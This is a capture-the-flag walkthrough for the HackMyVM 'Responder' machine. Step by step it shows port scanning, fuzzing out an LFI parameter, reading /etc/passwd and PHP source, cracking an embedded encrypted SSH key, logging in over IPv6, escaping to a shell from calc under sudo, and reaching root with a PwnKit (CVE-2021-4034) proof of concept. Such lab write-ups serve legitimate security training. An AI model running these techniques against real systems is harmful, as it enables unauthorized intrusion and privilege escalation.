HackMyVm Responder Walkthrough

HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan ports, notice the port 22 is filtered.

nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)

Check port 80, only a simple page tells the current time.

~/D/responder $curl 192.168.56.100                                              
your answer is in the answer.. it's
01:46
and your time is running out..

Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.

~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php            (Status: 200) [Size: 73]
/filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the param of filemanager.php, get random.

~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID           Response   Lines    Word       Chars       Payload                 
=====================================================================
000003395:   302        27 L     39 W       1430 Ch     "random"

LFI worked, check passwd, get two user names.

~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"         
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.

~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-en
code/resource=filemanager.php" |base64 -d                                                
...          
<?php                                                                                    
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');

/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...

Decrypt the ssh key with john.

~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt         
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx          (id_rsa)

Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.

Check ipv6 address of the machine.

~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...

Check port 22 with ipv6, yes, it's open.

~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Log in ssh as user elliot.

~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
Enter passphrase for key 'id_rsa': 
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter help page, input "!/bin/bash" after ":".

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; help
...
For more information while running calc, type  help  followed by one of the
following topics:

    topic               description
    -----               -----------
    intro               introduction to calc
    overview            overview of calc
    help                this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files, notice polkit.

elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Use the lastest CVE of polkit to get root.

elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
elliot@responder:/tmp$ ./cve-2021-4034-poc 
# id
uid=0(root) gid=0(root) groups=0(root),1001(elliot)

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注